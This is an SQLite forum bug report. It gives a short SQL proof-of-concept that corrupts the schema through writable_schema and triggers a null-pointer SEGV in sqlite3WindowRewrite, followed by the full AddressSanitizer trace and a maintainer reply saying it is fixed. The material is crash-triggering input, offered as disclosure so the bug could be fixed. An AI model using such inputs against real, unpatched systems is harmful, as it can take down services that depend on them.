A testcase causing SEGV in sqlite3WindowRewrite

(1) By Jingzhou Fu (fuboat) on 2022-03-10 15:33:08 [source]

System Information:

compile-time options: CC=clang-12 ./configure --enable-debug (can also be triggered in release version)
sqlite_source_id: 2022-03-10 11:48:16 4173819cd285a1c133645eda27b9f6dc5a2247eaa0c834bdc60058ef3109b102

PoC:

CREATE TABLE t7(x);
PRAGMA writable_schema=ON;
UPDATE sqlite_master SET sql='CREATE TABLE b AS SELECT
    sum(a) OVER win,
    min(a) OV FROM t1
  WINDOW win AS (ORDER BY a)';
CREATE TABLE t1(a);
CREATE TABLE x(y);
ALTER TABLE x RENAME y TO sqlsim0;

output when enable ASAN:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==127348==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x556923fda076 bp 0x7ffecbb7acb0 sp 0x7ffecbb7ab30 T0)
==127348==The signal is caused by a READ memory access.
==127348==Hint: address points to the zero page.
    #0 0x556923fda075 in sqlite3WindowRewrite /root/bld_debug_asan/sqlite3.c:159441
    #1 0x556923f6655d in sqlite3Select /root/bld_debug_asan/sqlite3.c:140846
    #2 0x556923eefc4c in sqlite3EndTable /root/bld_debug_asan/sqlite3.c:116949
    #3 0x556923fe8906 in yy_reduce /root/bld_debug_asan/sqlite3.c:165153
    #4 0x556923ff8368 in sqlite3Parser /root/bld_debug_asan/sqlite3.c:166761
    #5 0x556923ffdc25 in sqlite3RunParser /root/bld_debug_asan/sqlite3.c:168059
    #6 0x556923ecbbe4 in renameParseSql /root/bld_debug_asan/sqlite3.c:110177
    #7 0x556923ed1b2b in renameTableTest /root/bld_debug_asan/sqlite3.c:111025
    #8 0x556923e77826 in sqlite3VdbeExec /root/bld_debug_asan/sqlite3.c:95772
    #9 0x556923e37ac1 in sqlite3Step /root/bld_debug_asan/sqlite3.c:85948
    #10 0x556923e38305 in sqlite3_step /root/bld_debug_asan/sqlite3.c:86005
    #11 0x556923d0852f in exec_prepared_stmt /root/bld_debug_asan/shell.c:14648
    #12 0x556923d0a653 in shell_exec /root/bld_debug_asan/shell.c:14969
    #13 0x556923d342c6 in runOneSqlLine /root/bld_debug_asan/shell.c:22502
    #14 0x556923d34f8c in process_input /root/bld_debug_asan/shell.c:22630
    #15 0x556923d38700 in main /root/bld_debug_asan/shell.c:23464
    #16 0x7f6030a520b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    #17 0x556923ccc0ad in _start (/root/bin_debug_asan/usr/local/bin/sqlite3+0xd00ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/bld_debug_asan/sqlite3.c:159441 in sqlite3WindowRewrite
==127348==ABORTING

(2) By Richard Hipp (drh) on 2022-03-10 16:29:24 in reply to 1 [link] [source]

Fixed by check-in 58de3c2b1a773a71.